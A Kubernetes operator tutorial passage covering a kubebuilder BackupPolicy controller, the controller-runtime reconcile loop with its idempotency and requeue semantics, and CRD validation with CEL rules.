Edit internal/controller/backuppolicy_controller.go:

package controller

import (
    "context"
    "fmt"

    batchv1 "k8s.io/api/batch/v1"
    corev1 "k8s.io/api/core/v1"
    apierrors "k8s.io/apimachinery/pkg/api/errors"
    "k8s.io/apimachinery/pkg/api/meta"
    metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
    "k8s.io/apimachinery/pkg/runtime"
    "k8s.io/apimachinery/pkg/types"
    ctrl "sigs.k8s.io/controller-runtime"
    "sigs.k8s.io/controller-runtime/pkg/client"
    "sigs.k8s.io/controller-runtime/pkg/log"

    storagev1alpha1 "github.com/example/backup-operator/api/v1alpha1"
)

// BackupPolicyReconciler reconciles BackupPolicy objects.
type BackupPolicyReconciler struct {
    client.Client
    Scheme *runtime.Scheme
}

// RBAC markers — kubebuilder generates ClusterRole YAML from these comments.
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies,verbs=get;list;watch;create;update;patch;delete
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies/status,verbs=get;update;patch
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies/finalizers,verbs=update
//+kubebuilder:rbac:groups=batch,resources=cronjobs,verbs=get;list;watch;create;update;patch;delete

func (r *BackupPolicyReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    logger := log.FromContext(ctx)

    // Step 1: Fetch the BackupPolicy
    bp := &storagev1alpha1.BackupPolicy{}
    if err := r.Get(ctx, req.NamespacedName, bp); err != nil {
        if apierrors.IsNotFound(err) {
            // Object deleted before we could reconcile — nothing to do.
            return ctrl.Result{}, nil
        }
        return ctrl.Result{}, fmt.Errorf("fetching BackupPolicy: %w", err)
    }

    // Step 2: Define the desired CronJob name
    cronJobName := fmt.Sprintf("%s-backup", bp.Name)

    // Step 3: Fetch the existing CronJob (if any)
    existing := &batchv1.CronJob{}
    err := r.Get(ctx, types.NamespacedName{Name: cronJobName, Namespace: bp.Namespace}, existing)
    notFound := apierrors.IsNotFound(err)
    if err != nil && !notFound {
        return ctrl.Result{}, fmt.Errorf("fetching CronJob: %w", err)
    }

    // Step 4: Build the desired CronJob
    desired := r.buildCronJob(bp, cronJobName)

    // Step 5: Create or update
    if notFound {
        logger.Info("Creating CronJob", "name", cronJobName)
        if err := r.Create(ctx, desired); err != nil {
            return ctrl.Result{}, fmt.Errorf("creating CronJob: %w", err)
        }
    } else {
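        // Update schedule and suspend state if they differ.
        // Suspend is a *bool, so compare the pointed-to values, not the pointers.
        existingSuspend := existing.Spec.Suspend != nil && *existing.Spec.Suspend
        desiredSuspend := desired.Spec.Suspend != nil && *desired.Spec.Suspend
        if existing.Spec.Schedule != desired.Spec.Schedule ||
            existingSuspend != desiredSuspend {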
            existing.Spec.Schedule = desired.Spec.Schedule
            existing.Spec.Suspend = desired.Spec.Suspend
            logger.Info("Updating CronJob", "name", cronJobName)
            if err := r.Update(ctx, existing); err != nil {
                return ctrl.Result{}, fmt.Errorf("updating CronJob: %w", err)
            }
        }
    }

    // Step 6: Update status
    bpCopy := bp.DeepCopy()
    meta.SetStatusCondition(&bpCopy.Status.Conditions, metav1.Condition{
        Type:               "Ready",
        Status:             metav1.ConditionTrue,
        Reason:             "CronJobReady",
        Message:            fmt.Sprintf("CronJob %s is configured", cronJobName),
        ObservedGeneration: bp.Generation,
    })
    bpCopy.Status.CronJobName = cronJobName

    if err := r.Status().Update(ctx, bpCopy); err != nil {
        return ctrl.Result{}, fmt.Errorf("updating status: %w", err)
    }

    return ctrl.Result{}, nil
}

func (r *BackupPolicyReconciler) buildCronJob(bp *storagev1alpha1.BackupPolicy, name string) *batchv1.CronJob {
    suspend := bp.Spec.Suspended
    retentionArg := fmt.Sprintf("--retention-days=%d", bp.Spec.RetentionDays)

    cj := &batchv1.CronJob{
        ObjectMeta: metav1.ObjectMeta{
            Name:      name,
            Namespace: bp.Namespace,
            Labels: map[string]string{
                "app.kubernetes.io/managed-by": "backup-operator",
                "backuppolicy":                 bp.Name,
            },
        },
        Spec: batchv1.CronJobSpec{
            Schedule: bp.Spec.Schedule,
            Suspend:  &suspend,
            JobTemplate: batchv1.JobTemplateSpec{
                Spec: batchv1.JobSpec{
                    Template: corev1.PodTemplateSpec{
                        Spec: corev1.PodSpec{
                            RestartPolicy: corev1.RestartPolicyOnFailure,
                            Containers: []corev1.Container{
                                {
                                    Name:    "backup",
                                    Image:   "backup-tool:latest",
                                    Args:    []string{retentionArg},
                                },
                            },
                        },
                    },
                },
            },
        },
    }

    // Set owner reference — CronJob is garbage-collected when BackupPolicy is deleted
    _ = ctrl.SetControllerReference(bp, cj, r.Scheme)
    return cj
}

// SetupWithManager registers the controller with the manager and declares what to watch.
func (r *BackupPolicyReconciler) SetupWithManager(mgr ctrl.Manager) error {
    return ctrl.NewControllerManagedBy(mgr).
        For(&storagev1alpha1.BackupPolicy{}).
        Owns(&batchv1.CronJob{}).    // reconcile BackupPolicy when owned CronJob changes
        Complete(r)
}

Step 4: Install the CRD and Run Locally

# Install the CRD into the cluster
make install
customresourcedefinition.apiextensions.k8s.io/backuppolicies.storage.example.com created
# Run the controller locally (outside the cluster)
make run
2026-04-25T08:00:00Z  INFO  Starting manager
2026-04-25T08:00:00Z  INFO  Starting workers  {"controller": "backuppolicy", "worker count": 1}

In a separate terminal:

kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: nightly
  namespace: default
spec:
  schedule: "0 2 * * *"
  retentionDays: 30
EOF

Watch the controller output:

2026-04-25T08:01:00Z  INFO  Creating CronJob  {"name": "nightly-backup"}

Check the result:

kubectl get bp nightly
NAME      SCHEDULE    RETENTION   SUSPENDED   READY   AGE
nightly   0 2 * * *   30          false       True    10s
kubectl get cronjob nightly-backup
NAME             SCHEDULE    SUSPEND   ACTIVE   LAST SCHEDULE   AGE
nightly-backup   0 2 * * *   False     0        <none>          10s

Test self-healing — delete the CronJob and watch the controller recreate it:

kubectl delete cronjob nightly-backup
# Controller output:
# 2026-04-25T08:02:00Z  INFO  Creating CronJob  {"name": "nightly-backup"}

kubectl get cronjob nightly-backup
# Back within seconds

Test suspend:

kubectl patch bp nightly --type=merge -p '{"spec":{"suspended":true}}'
kubectl get cronjob nightly-backup -o jsonpath='{.spec.suspend}'
# true

Step 5: Deploy to Cluster

When ready for in-cluster deployment:

# Build and push the controller image
make docker-build docker-push IMG=your-registry/backup-operator:v0.1.0

# Deploy to cluster (creates Deployment, RBAC, CRD)
make deploy IMG=your-registry/backup-operator:v0.1.0
kubectl get pods -n backup-operator-system
NAME                                          READY   STATUS    RESTARTS   AGE
backup-operator-controller-manager-abc123     2/2     Running   0          30s

Understanding the RBAC Markers

The //+kubebuilder:rbac:... comments in the controller generate the ClusterRole YAML when you run make manifests:

//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies,verbs=get;list;watch;create;update;patch;delete
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies/status,verbs=get;update;patch
//+kubebuilder:rbac:groups=batch,resources=cronjobs,verbs=get;list;watch;create;update;patch;delete

Generated YAML under config/rbac/role.yaml:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: manager-role
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies/status"]
    verbs: ["get", "update", "patch"]
  - apiGroups: ["batch"]
    resources: ["cronjobs"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]

This approach keeps RBAC co-located with the code that needs it — if you add a new resource access in the controller, you add the marker next to it.


⚠ Common Mistakes

Not setting an owner reference on child resources. Without ctrl.SetControllerReference(parent, child, scheme), deleting the BackupPolicy leaves orphaned CronJobs. Owner references enable automatic garbage collection of child resources.

Updating the object after r.Get() without handling conflicts. The copy you read may be stale by the time you write it: the cache can lag behind, or another client (a user, another controller) may have modified the object in between. The API server uses resourceVersion for optimistic concurrency, so the update fails with a conflict error. Retry the reconcile on conflict errors rather than treating them as fatal.

Writing to bp directly instead of bp.DeepCopy() for status updates. If the status update fails and you retry, the original bp object now has the modified status in memory. Always update a deep copy when writing status so the in-memory state stays consistent with what was actually persisted.

Not watching owned resources. If you forget .Owns(&batchv1.CronJob{}) in SetupWithManager, the controller will not reconcile when a CronJob is deleted. Self-healing requires watching the resources you manage.
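The conflict-handling mistake above comes down to one loop: re-read, re-apply the change, try again. The sketch below models that with a hypothetical in-memory store standing in for the API server's resourceVersion check. The store, object, and updateWithRetry names are assumptions for illustration, not controller-runtime APIs.

```go
package main

import (
	"errors"
	"fmt"
)

var errConflict = errors.New("conflict: resourceVersion is stale")

// object is a minimal stand-in for a Kubernetes object.
type object struct {
	ResourceVersion int
	Suspended       bool
}

// store mimics optimistic concurrency: an update is accepted only if the
// caller's resourceVersion matches the stored one.
type store struct{ current object }

func (s *store) Get() object { return s.current }

func (s *store) Update(o object) error {
	if o.ResourceVersion != s.current.ResourceVersion {
		return errConflict
	}
	o.ResourceVersion++
	s.current = o
	return nil
}

// updateWithRetry re-reads the object and re-applies mutate after each conflict,
// giving up after the given number of attempts.
func updateWithRetry(s *store, attempts int, mutate func(*object)) error {
	var err error
	for i := 0; i < attempts; i++ {
		obj := s.Get() // always start from the latest version
		mutate(&obj)
		if err = s.Update(obj); !errors.Is(err, errConflict) {
			return err
		}
	}
	return err
}

func main() {
	s := &store{current: object{ResourceVersion: 1}}
	interfered := false
	err := updateWithRetry(s, 3, func(o *object) {
		if !interfered {
			// Simulate another writer landing between our read and our write.
			s.current.ResourceVersion++
			interfered = true
		}
		o.Suspended = true
	})
	fmt.Println(err, s.current.Suspended, s.current.ResourceVersion)
}
```

In a real controller the simplest equivalent is to return the conflict error from Reconcile and let the work queue retry. client-go also ships a retry.RetryOnConflict helper for cases where you want to retry inline.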


Quick Reference

# Scaffold a new API + controller
kubebuilder create api --group mygroup --version v1alpha1 --kind MyKind

# Regenerate deep copy methods after changing types
make generate

# Regenerate CRD YAML + RBAC from markers
make manifests

# Install CRD into current cluster
make install

# Run controller locally (outside cluster)
make run

# Build + push image, then deploy to cluster
make docker-build docker-push IMG=registry/operator:tag
make deploy IMG=registry/operator:tag

# Uninstall CRD (WARNING: deletes all instances)
make uninstall

Key Takeaways

  • kubebuilder scaffolds the project; you write the types and the reconcile function
  • Go struct markers (//+kubebuilder:...) generate the CRD YAML and RBAC — keep them close to the code they describe
  • ctrl.SetControllerReference enables automatic garbage collection of child resources
  • Always deep-copy the object before writing status; retry on conflict errors
  • make run runs the controller locally — no Docker build needed during development

What’s Next

EP08: Kubernetes CRD Versioning covers how to evolve the BackupPolicy schema from v1alpha1 to v1 without breaking existing clients — storage versions, conversion webhooks, and the hub-and-spoke model for safe API evolution in production clusters.


The Kubernetes Controller Reconcile Loop: How CRDs Come Alive at Runtime

Reading Time: 7 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 6


TL;DR

  • The Kubernetes controller reconcile loop is the mechanism that makes CRDs do something — it watches custom resources, compares desired state (spec) to actual state, and takes actions to close the gap
    (reconcile = “make actual match desired”; the loop runs repeatedly because the world is not static — things drift, fail, and change)
  • Controllers do not receive events like webhooks — they receive object names from a work queue, then re-read the full object from the API server cache
  • The reconcile function is idempotent: calling it ten times with the same object must produce the same result as calling it once
  • controller-runtime is the Go library that provides the informer cache, work queue, and reconciler interface — kubebuilder scaffolds controllers on top of it
  • Kubernetes uses the same reconcile loop internally — the Deployment controller, ReplicaSet controller, and node lifecycle controller all follow this exact pattern
  • A failed reconcile returns an error or explicit requeue request; the controller retries with exponential backoff, not an infinite tight loop

The Big Picture

  THE KUBERNETES CONTROLLER RECONCILE LOOP

  etcd
   │ change event
   ▼
  Informer cache
  (client-side list+watch against
   the API server, local in-memory replica)
   │ cache update → enqueue object name
   ▼
  Work queue
  (rate-limited, deduplicating)
   │ dequeue: "demo/nightly"
   ▼
  Reconcile(ctx, Request{Name, Namespace})
   │
   ├── 1. Fetch object from cache
   │        if not found → ignore (already deleted)
   │
   ├── 2. Read spec (desired state)
   │
   ├── 3. Read actual state
   │        (check child resources, external systems)
   │
   ├── 4. Compare: actual vs desired
   │
   ├── 5. Act: create/update/delete child resources
   │        OR update external system
   │
   └── 6. Update status with outcome
           └── return Result{}, nil               → done
               return Result{Requeue: true}, nil  → rate-limited requeue
               return Result{}, err               → retry with backoff

The Kubernetes controller reconcile loop is what separates a CRD (validated storage) from an operator (automated behavior). Understanding this loop is the prerequisite for writing controllers that work correctly under failure, partial completion, and concurrent modification.
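The "retry with backoff" arm of the diagram is worth a quick sketch. The code below computes a per-item exponential delay in plain Go. The 5 ms base and 1000 s cap are assumptions chosen for illustration, and backoffDelay is a hypothetical helper, not the work queue's actual rate limiter.

```go
package main

import (
	"fmt"
	"time"
)

// Illustrative values only; the real rate limiter's settings may differ.
const (
	baseDelay = 5 * time.Millisecond
	maxDelay  = 1000 * time.Second
)

// backoffDelay returns base doubled once per previous failure, capped at max.
func backoffDelay(base, max time.Duration, failures int) time.Duration {
	delay := base
	for i := 0; i < failures; i++ {
		delay *= 2
		if delay >= max {
			return max // stop early so the value can never overflow
		}
	}
	return delay
}

func main() {
	for _, failures := range []int{0, 1, 2, 3, 10, 30} {
		fmt.Printf("after %2d failures: wait %v\n",
			failures, backoffDelay(baseDelay, maxDelay, failures))
	}
}
```

The point of the cap is that a permanently failing object settles into a slow, steady retry instead of either hammering the API server or backing off forever.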


What “Reconcile” Actually Means

Reconcile means: look at what the user asked for (spec), look at what actually exists, and do whatever is needed to make actual match desired.

The key insight is that this is not event-driven in the traditional sense. A controller does not receive a “diff” — it receives a name. It reads the full current state of the object and acts accordingly.

This matters because:

  1. Multiple events get deduplicated. If a BackupPolicy is updated five times while its key is still waiting in the work queue, the controller gets one reconcile call, not five.
  2. The reconcile is stateless. The controller should not maintain in-memory state about what it “did last time.” It re-reads everything on each reconcile.
  3. Partial failure is safe. If the reconcile fails halfway through, the next reconcile re-reads actual state and continues from where it left off.
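The deduplication in point 1 falls out of how the queue stores keys. Here is a minimal sketch of a deduplicating queue in plain Go. dedupQueue is a hypothetical toy, not the client-go work queue, and it ignores rate limiting and concurrency entirely.

```go
package main

import "fmt"

// dedupQueue keeps at most one pending entry per key, in arrival order.
type dedupQueue struct {
	pending map[string]bool
	order   []string
}

func newDedupQueue() *dedupQueue {
	return &dedupQueue{pending: map[string]bool{}}
}

// Add enqueues key unless it is already waiting.
func (q *dedupQueue) Add(key string) {
	if q.pending[key] {
		return
	}
	q.pending[key] = true
	q.order = append(q.order, key)
}

// Get removes and returns the oldest key; ok is false when the queue is empty.
func (q *dedupQueue) Get() (key string, ok bool) {
	if len(q.order) == 0 {
		return "", false
	}
	key = q.order[0]
	q.order = q.order[1:]
	delete(q.pending, key)
	return key, true
}

// Len reports how many keys are waiting.
func (q *dedupQueue) Len() int { return len(q.order) }

func main() {
	q := newDedupQueue()
	for i := 0; i < 5; i++ {
		q.Add("demo/nightly") // five update events for the same object
	}
	q.Add("demo/weekly")
	fmt.Println("pending reconciles:", q.Len())
}
```

Because the queue holds only the key, the reconciler has no choice but to re-read the current object, which is exactly what makes the loop stateless.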

The Informer Cache

Controllers do not call the API server directly for every read. They use an informer — a list-and-watch mechanism that maintains a local in-memory copy of all objects of a given type.

  HOW THE INFORMER CACHE WORKS

  Controller startup:
  ┌─────────────────────────────────────────────────────┐
  │ 1. List all BackupPolicies from API server          │
  │    → populate local cache                           │
  │ 2. Establish a Watch stream                         │
  │    → receive incremental updates                    │
  │ 3. For each update: update cache + enqueue object   │
  └─────────────────────────────────────────────────────┘

  On reconcile:
  ┌─────────────────────────────────────────────────────┐
  │ controller reads from LOCAL cache (not API server)  │
  │ → fast, no network round-trip per reconcile         │
  │ → cache is eventually consistent                    │
  └─────────────────────────────────────────────────────┘

Cache consistency: After writing a change (creating a child Secret, for example), re-reading from the cache may return the old state for a brief period. This is normal and expected. Well-written controllers handle this by returning a requeue rather than assuming the write is immediately visible.


Walking Through a Reconcile for BackupPolicy

Suppose a user creates this BackupPolicy:

apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: nightly
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 30
  targets:
    - namespace: production

The controller’s reconcile function runs. Here is what it does conceptually:

Reconcile(ctx, {Namespace: "demo", Name: "nightly"})

Step 1: Fetch BackupPolicy "demo/nightly" from cache
  → found; spec.schedule = "0 2 * * *", spec.retentionDays = 30

Step 2: Check if a CronJob for this BackupPolicy exists
  → kubectl get cronjob nightly-backup -n demo
  → not found

Step 3: Gap detected: CronJob should exist but doesn't
  → Create CronJob "nightly-backup" in namespace "demo"
    spec.schedule = "0 2 * * *"
    spec.jobTemplate.spec.template.spec.containers[0].args = ["--retention-days=30"]

Step 4: Set owner reference on CronJob pointing to BackupPolicy
  → CronJob is now garbage-collected if BackupPolicy is deleted

Step 5: Update BackupPolicy status
  → conditions: [{type: Ready, status: True, reason: CronJobCreated}]
  → lastScheduleTime: null (not yet run)

Step 6: Return Result{}, nil   → reconcile complete

Next time the BackupPolicy is modified (e.g., suspended: true):

Reconcile(ctx, {Namespace: "demo", Name: "nightly"})

Step 1: Fetch → spec.suspended = true

Step 2: Fetch CronJob "nightly-backup"
  → found; spec.suspend = false  ← actual state

Step 3: Gap: CronJob.spec.suspend should be true but is false
  → Patch CronJob: set spec.suspend = true

Step 4: Update status
  → conditions: [{type: Ready, status: True, reason: Suspended}]

Step 5: Return Result{}, nil
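
The two walkthroughs above can be sketched as one function that derives the desired CronJob from the policy and compares it with what exists. This is a minimal, stdlib-only sketch: the BackupPolicy and CronJob structs here are simplified stand-ins invented for illustration, not the real API types, and the "cluster" is just a pointer that is nil when the CronJob is missing.

```go
package main

import (
	"fmt"
	"reflect"
)

// BackupPolicy and CronJob are simplified stand-ins, not the real API types.
type BackupPolicy struct {
	Schedule      string
	RetentionDays int
	Suspended     bool
}

type CronJob struct {
	Schedule string
	Args     []string
	Suspend  bool
}

// desiredCronJob derives the CronJob that the policy's spec asks for.
func desiredCronJob(p BackupPolicy) CronJob {
	return CronJob{
		Schedule: p.Schedule,
		Args:     []string{fmt.Sprintf("--retention=%d", p.RetentionDays)},
		Suspend:  p.Suspended,
	}
}

// reconcile compares desired and actual state and returns the resulting
// CronJob plus the action taken. actual is nil when no CronJob exists yet.
func reconcile(p BackupPolicy, actual *CronJob) (CronJob, string) {
	want := desiredCronJob(p)
	switch {
	case actual == nil:
		return want, "create"
	case !reflect.DeepEqual(*actual, want):
		return want, "update"
	default:
		return *actual, "none"
	}
}

func main() {
	policy := BackupPolicy{Schedule: "0 2 * * *", RetentionDays: 30}

	job, action := reconcile(policy, nil)
	fmt.Println(action) // create

	policy.Suspended = true
	job, action = reconcile(policy, &job)
	fmt.Println(action, job.Suspend) // update true

	_, action = reconcile(policy, &job)
	fmt.Println(action) // none
}
```

The third call is the interesting one: nothing changed, so the function finds no gap and does nothing. A real reconciler would also write status and return a Result, which this sketch leaves out.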

Idempotency: The Essential Property

The reconcile function must be idempotent. If it runs ten times with the same object state, the result must be the same as if it ran once.

Why? Because the controller framework delivers at-least-once semantics — your reconcile function will be called more than once for the same object state, especially at startup (the informer re-lists all objects) and after controller restarts.

Non-idempotent (wrong):

// Calls Create on every reconcile: the second run fails with AlreadyExists
// (or, if the name is generated, leaves a duplicate CronJob behind)
err := r.Create(ctx, cronJob)

Idempotent (correct):

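// Create the CronJob only if it is missing; update it if it already exists.
existing := &batchv1.CronJob{}
err := r.Get(ctx, types.NamespacedName{Name: jobName, Namespace: ns}, existing)
switch {
case apierrors.IsNotFound(err):
    err = r.Create(ctx, cronJob)
case err == nil:
    // Overwrite the live spec so it converges on the desired one.
    existing.Spec = cronJob.Spec
    err = r.Update(ctx, existing)
}
if err != nil {
    // Any remaining error (from Get, Create, or Update) is retried with backoff.
    return ctrl.Result{}, err
}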

The get-before-create pattern is the most basic idempotency mechanism. controller-runtime provides CreateOrUpdate helpers that codify this.
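
To see why the pattern matters under at-least-once delivery, here is a small stdlib-only sketch that runs the same "ensure" step ten times against an in-memory map. The store type and its counters are hypothetical stand-ins for the cluster, introduced only to make the effect countable.

```go
package main

import "fmt"

// store is a stand-in for the cluster: CronJob name → schedule.
type store struct {
	cronJobs map[string]string
	creates  int
	updates  int
}

// ensureCronJob is the get-before-create pattern: create when missing,
// update only when the schedule differs, otherwise do nothing.
func (s *store) ensureCronJob(name, schedule string) {
	current, found := s.cronJobs[name]
	switch {
	case !found:
		s.cronJobs[name] = schedule
		s.creates++
	case current != schedule:
		s.cronJobs[name] = schedule
		s.updates++
	}
}

func main() {
	s := &store{cronJobs: map[string]string{}}
	for i := 0; i < 10; i++ {
		s.ensureCronJob("nightly-backup", "0 2 * * *")
	}
	// One object, one create, no updates, regardless of how often it ran.
	fmt.Println(len(s.cronJobs), s.creates, s.updates) // 1 1 0
}
```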


Requeue and Retry Semantics

The reconcile function returns a (Result, error) pair:

return Result{}, nil
  → Reconcile succeeded. Re-run only if object changes again.

return Result{RequeueAfter: 5 * time.Minute}, nil
  → Reconcile succeeded, but requeue in 5 minutes regardless.
  → Used for: polling external system, TTL-based refresh.

return Result{Requeue: true}, nil
  → Requeue immediately (with rate limiting).
  → Used for: cache not yet consistent after a write.

return Result{}, err
  → Reconcile failed. Retry with exponential backoff.
  → Used for: API errors, transient failures.
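
  RETRY BEHAVIOR (controller-runtime default rate limiter)

  First failure  → retry after ~5ms
  Second failure → retry after ~10ms
  Third failure  → retry after ~20ms
  ...            → delay doubles on each consecutive failure
  Max backoff    → 1000s, about 16min (controller-runtime default)

  Object changes (new version from informer) → enqueued immediately, without waiting out the backoff delay
  Successful reconcile → backoff counter for that object resets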

Do not return Result{Requeue: true}, nil in a tight loop — this saturates the work queue and starves other objects. If you need to poll, use RequeueAfter with a meaningful interval.


Watches: What Triggers a Reconcile

The controller does not only watch the primary resource (BackupPolicy). It also watches child resources and maps child changes back to the parent:

  WATCH CONFIGURATION (conceptual)

  Controller watches:
    BackupPolicy (primary) → reconcile when BackupPolicy changes
    CronJob (child/owned)  → reconcile BackupPolicy owner when CronJob changes
    ConfigMap (watched)    → reconcile BackupPolicy when referenced ConfigMap changes

If a user accidentally deletes the CronJob that the controller created:

  1. CronJob deletion event arrives in the informer
  2. Controller maps the deleted CronJob → its owner BackupPolicy
  3. BackupPolicy is enqueued
  4. Reconcile runs, detects missing CronJob, recreates it

This “self-healing” behavior — where controllers reconcile the world back to desired state — is the core operational value of operators. It is not magic; it is the result of watching child resources and re-running reconcile when they drift.
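
Step 2 of that sequence, mapping a child event back to its owner, can be sketched without any Kubernetes libraries. The types below are hypothetical, pared-down versions of an object with owner references and a reconcile request; controller-runtime's own owner handling is stricter (it follows the controller owner reference), so treat this as an illustration of the idea only.

```go
package main

import "fmt"

// ownerRef, object, and request are simplified stand-ins for illustration.
type ownerRef struct{ Kind, Name string }

type object struct {
	Namespace, Name string
	Owners          []ownerRef
}

type request struct{ Namespace, Name string }

// requestsForOwner turns an event on a child object into reconcile requests
// for every owner of the given kind. Owners live in the child's namespace.
func requestsForOwner(child object, ownerKind string) []request {
	var reqs []request
	for _, o := range child.Owners {
		if o.Kind == ownerKind {
			reqs = append(reqs, request{Namespace: child.Namespace, Name: o.Name})
		}
	}
	return reqs
}

func main() {
	deleted := object{
		Namespace: "demo",
		Name:      "nightly-backup",
		Owners:    []ownerRef{{Kind: "BackupPolicy", Name: "nightly"}},
	}
	// The CronJob's deletion enqueues its owning BackupPolicy.
	fmt.Println(requestsForOwner(deleted, "BackupPolicy")) // [{demo nightly}]
}
```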


Level-Triggered vs Edge-Triggered

Kubernetes controllers are level-triggered, not edge-triggered. This distinction matters:

  EDGE-TRIGGERED (not what Kubernetes uses)
  → "BackupPolicy was updated FROM retained-30 TO retained-7"
  → If event is lost, the update is lost forever

  LEVEL-TRIGGERED (what Kubernetes uses)
  → "BackupPolicy exists with retentionDays=7"
  → On every reconcile, the controller reads the current level (state)
  → Missing an event is safe — the next reconcile corrects the state

Level-triggered design is why controllers survive restarts, network partitions, and lost events gracefully. The reconcile does not need to track “what changed” — it only needs to know “what is the desired state right now.”
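
A toy comparison makes the difference concrete. In this stdlib-only sketch the update event that changes retention from 30 to 7 is lost; the function names and the update type are invented for illustration.

```go
package main

import "fmt"

// update is an edge: it describes one change to retentionDays.
type update struct{ from, to int }

// edgeTriggered replays only the updates that were actually delivered.
func edgeTriggered(actual int, delivered []update) int {
	for _, u := range delivered {
		if actual == u.from {
			actual = u.to
		}
	}
	return actual
}

// levelTriggered ignores history and converges on the current desired value.
func levelTriggered(actual, desired int) int {
	if actual != desired {
		actual = desired
	}
	return actual
}

func main() {
	desired := 7           // spec.retentionDays after the user's edit
	var delivered []update // the 30 → 7 event never arrived

	fmt.Println("edge: ", edgeTriggered(30, delivered)) // 30, stale
	fmt.Println("level:", levelTriggered(30, desired))  // 7, corrected
}
```

The edge-triggered consumer stays at 30 because it can only act on events it received. The level-triggered one reads the current spec on its next run and ends up correct without knowing an event was missed.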


The Same Pattern in Kubernetes Core

Every built-in Kubernetes controller follows this loop:

  Controller                  Watches     Manages          Reconciles
  Deployment controller       Deployment  ReplicaSets      desired replicas ↔ actual ReplicaSet count
  ReplicaSet controller       ReplicaSet  Pods             desired replicas ↔ running Pod count
  Node lifecycle controller   Node        Node conditions  NotReady nodes → taint, evict pods
  Service controller (cloud)  Service     LoadBalancer     cloud LB exists ↔ Service spec

The BackupPolicy controller you will build in EP07 follows exactly the same structure as the Deployment controller.


⚠ Common Mistakes

Reading from the API server directly instead of the cache. Every reconcile reading directly from the API server (not the informer cache) creates N×M load on the API server as the number of objects and reconcile frequency grows. Always read via the controller’s cached client.

Not handling “not found” on object fetch. If a reconcile is triggered but the object has been deleted by the time reconcile runs, the cache returns “not found.” This is normal — the correct response is to return Result{}, nil, not an error.

Tight requeue loop on recoverable error. Returning Result{Requeue: true}, nil or Result{}, err on every call creates an infinite busy-loop. Use RequeueAfter for expected wait conditions, and only return errors for unexpected failures that should back off.

Mutable reconcile state. Do not store reconcile state in struct fields on the reconciler. The reconciler is shared across goroutines; mutable fields cause race conditions. Everything transient must be local to the reconcile function.


Quick Reference

Reconcile input:
  ctx context.Context
  req ctrl.Request   → {Namespace: "demo", Name: "nightly"}

Reconcile output:
  (ctrl.Result, error)

Common returns:
  Result{}, nil                        → done, wait for next change
  Result{Requeue: true}, nil           → retry now (rate limited)
  Result{RequeueAfter: 5*time.Minute}, nil → retry in 5 minutes
  Result{}, err                        → retry with backoff

Key operations:
  r.Get(ctx, req.NamespacedName, &obj)     → fetch from cache
  r.Create(ctx, &obj)                      → create in API server
  r.Update(ctx, &obj)                      → full update
  r.Patch(ctx, &obj, patch)                → partial update
  r.Delete(ctx, &obj)                      → delete
  r.Status().Update(ctx, &obj)             → update status only

Key Takeaways

  • The reconcile loop reads desired state from spec, reads actual state from the cluster, and closes the gap — on every trigger, not just on changes
  • Controllers use an informer cache for reads — fast, eventually consistent, does not hammer the API server
  • Idempotency is not optional: the reconcile function will be called multiple times with the same state
  • Level-triggered design means missing events is safe — the next reconcile corrects any drift
  • Return values from reconcile control retry behavior: RequeueAfter for polling, err for failures, nil for success

What’s Next

EP07: Build a Simple Kubernetes Operator with controller-runtime puts the reconcile loop into practice — kubebuilder scaffold, a complete reconciler for BackupPolicy, RBAC markers, and running the operator locally against a real cluster.


Kubernetes CRD CEL Validation: Replace Admission Webhooks for Schema Rules

Reading Time: 6 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 5


TL;DR

  • Kubernetes CRD CEL validation (x-kubernetes-validations) lets you write arbitrary validation rules in the CRD schema — no admission webhook needed
    (CEL = Common Expression Language, a lightweight expression language; CRD validation rules have been enabled by default since Kubernetes 1.25 (beta) and are GA since 1.29; they replace most reasons you would write a validating admission webhook)
  • CEL rules are evaluated by the API server at admit time — the same place as OpenAPI schema validation, before etcd
  • self refers to the current object’s field; oldSelf refers to the previous value (for update rules)
  • Cross-field validation: “if storageClass is premium, retentionDays must be ≤ 90” is impossible with plain OpenAPI schema and trivial with CEL
  • Immutable fields: a transition rule such as self == oldSelf rejects any update that changes the value after creation
  • CEL rules run in ~microseconds inside the API server; no external service, no TLS, no latency budget to manage

The Big Picture

  CEL VALIDATION: WHERE IT FITS IN THE ADMISSION CHAIN

  kubectl apply -f backup.yaml
         │
         ▼
  API Server admission chain
  ┌────────────────────────────────────────────────────┐
  │                                                    │
  │  1. Mutating admission webhooks (modify object)    │
  │  2. Schema validation (OpenAPI types, required,    │
  │     minimum/maximum, pattern)                      │
  │  3. CEL validation (x-kubernetes-validations)  ←  │ THIS EPISODE
  │  4. Validating admission webhooks (external)       │
  │                                                    │
  └────────────────────────────────────────────────────┘
         │
         ▼ (passes all checks)
  etcd storage

Kubernetes CRD CEL validation sits between schema validation and external webhooks. For most validation requirements, CEL eliminates the need for a webhook entirely — which means no separate deployment to maintain, no TLS certificates to rotate, no availability dependency between your CRD and a webhook server.


Why CEL Replaces Most Admission Webhooks

Before CEL validation rules (beta and on by default in Kubernetes 1.25, GA in 1.29), the only way to express “if field A has value X, field B must be present” was an admission webhook: a separate HTTP server that Kubernetes called synchronously during every API request.

Webhooks work, but they have real costs:

  • Availability dependency: if the webhook is down, creates/updates for that resource type fail
  • TLS management: webhook endpoints require valid TLS certs that must be rotated
  • Deployment overhead: another Deployment, Service, and certificate to manage
  • Latency: every API operation waits for an HTTP round-trip

CEL runs inside the API server process. There is no network call, no certificate, no separate deployment. Rules are compiled once and evaluated in microseconds.

The trade-off: CEL cannot make network calls or access state outside the object being validated. For rules that need to look up other resources (e.g., “does this referenced Secret exist?”), you still need a webhook or a controller that validates via status conditions.


